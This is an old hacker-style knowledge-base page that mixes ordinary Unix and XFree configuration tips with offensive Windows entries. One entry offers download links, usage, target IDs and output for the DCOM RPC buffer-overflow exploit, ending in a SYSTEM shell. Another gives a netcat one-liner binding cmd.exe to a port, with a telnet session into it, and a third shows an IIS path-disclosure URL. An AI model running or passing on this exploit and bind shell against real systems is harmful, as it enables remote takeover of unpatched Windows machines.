Samba guide

http://www.samba.netfirms.com/index.htm
//Vladimirr

Published in Knowledge Base, Links, Old Base

Mousewheel in Xfree

Add the line 'Option      "ZAxisMapping" "4 5"' to your Mouse section. It could look like this (on FreeBSD; it might be a little different elsewhere, but the ZAxisMapping part should be similar):

Section "InputDevice"
        Identifier  "Mouse0"
        Driver      "mouse"
        Option      "ZAxisMapping" "4 5"
        Option      "Protocol" "auto"
        Option      "Device" "/dev/sysmouse"
EndSection
Published in Knowledge Base, Linux, Old Base

Smb mounts in FreeBSD

Add the following options to your kernel configuration:
options         NETSMB
options         SMBFS
options         NETSMBCRYPTO
options         LIBMCHAIN
options         LIBICONV

Compile, install and reboot,

then mount with this command:

peanut# mount_smbfs -I 192.168.10.122 //mikr@ost/c$ /mnt
Password:
Published in FreeBSD, Knowledge Base, Old Base

Penetrating windows #2 (dcom rpc bof)

Files:
Source: http://base.fujang.dk/files/mike/dcom.c (include <error.h> removed)
Freebsd binary: http://base.fujang.dk/files/mike/dcom
Windows binary: http://base.fujang.dk/files/mike/dcom.exe + cygwin1.dll
The Windows binary was compiled by padde (www.beastie.dk); modifications were
made to make it compile under Cygwin, so the source file available here was not
used to compile this binary.

Windows usage:

C:\>domc 0 192.168.10.123
---------------------------------------------------------
- Remote DCOM RPC Buffer Overflow Exploit
- Using return address of 0x77e81674
- Dropping to System Shell...

Microsoft Windows 2000 [version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.

C:\WINNT\system32>whoami
whoami
NT AUTHORITY\SYSTEM

C:\WINNT\system32>

Unix usage:
bash$ ./dcom 0 192.168.10.123
---------------------------------------------------------
- Remote DCOM RPC Buffer Overflow Exploit
- Original code by FlashSky and Benjurry
- Rewritten by HDM <hdm [at] metasploit.com>
- Using return address of 0x77e81674
- Dropping to System Shell...

Microsoft Windows 2000 [version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.

C:\WINNT\system32>


The leading zero (the first argument) must be set to one of the following values,
which describes the target system:
-          0    Windows 2000 SP0 (english)
-          1    Windows 2000 SP1 (english)
-          2    Windows 2000 SP2 (english)
-          3    Windows 2000 SP3 (english)
-          4    Windows 2000 SP4 (english)
-          5    Windows XP SP0 (english)
-          6    Windows XP SP1 (english)

Though it says English, I have successfully tested this against several Danish
versions as well.

You will most likely have only one shot at this one, because the vulnerable service
will crash after one try. Also, after successfully exploiting this you won't be
able to exploit it again, because the service crashes. For more information, read the source.

It looks as though the service continues running during the shell; to restart it, type: net start rpcss. Starting it from the shell won't help; it has to be done afterwards.
Published in Backdoors, Knowledge Base, Old Base, Windows

Mode switching between layouts

As most Danish hackers have discovered, the DK keyboard layout really sucks when it comes to programming/code hacking. But running entirely with the US keyboard layout doesn't work either, because you need to write the Danish special characters æ, ø and å.
There is, however, a solution to this. It requires you to run XFree86 version 4.2.0 or later.
In the XF86Config file, set the layout to us,dk and use grp:caps_toggle as the option.
You can also use it as a command in your .xinitrc or .xsession file; then the syntax is setxkbmap -rules xfree86 -layout "us,dk" -option "grp:caps_toggle".
Published in Knowledge Base, Linux, Old Base, Workstation

Source audit

IF you have the source code, you can check out the following links:
http://www.dwheeler.com/flawfinder/
http://www.cigital.com/its4/
http://www.securesoftware.com/download_form_rats.htm
http://www.cs.wisc.edu/~bart/fuzz/fuzz.html (MAYBE?)
ELSIF YOU ONLY HAVE THE BINARY THEN
check out the Black Hat presentations, like:
http://www.blackhat.com/html/bh-europe-00/bh-europe-00-speakers.html#HalVar
Published in Knowledge Base, Links, Old Base

Remove ^M from windoze files

Taken from FreeBSD quotes

Need to remove all those ^M characters from a DOS file? Try

        col -bx < dosfile > newfile
Published in FreeBSD, Knowledge Base, Old Base

Network Programming in C

An easy guide to network programming in C:

http://tinyurl.com/685d

/secor
Published in Knowledge Base, Networking, Old Base, Programming

IIS Vuln.

http://1.0.0.13/_vti_bin/shtml.exe/postinfo1.html

responds with:
"c:\inetpub\wwwroot\postinfo1.html" kan ikke åbnes: Filen eller mappen findes ikke.
Published in Knowledge Base, Old Base, Windows

Bind shell in windows

nc -L -d -e cmd.exe -p 8080

This will bind a cmd.exe to port 8080:

root@camp:~# telnet 1.0.0.13 8080
Trying 1.0.0.13...
Connected to 1.0.0.13.
Escape character is '^]'.
Microsoft Windows 2000 [version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.

C:\>whoami
whoami
HONEYPOT\Administrator

nc and whoami are programs installed by me, and not default windoze apps.
Published in Knowledge Base, Networking, Old Base, Windows, Workstation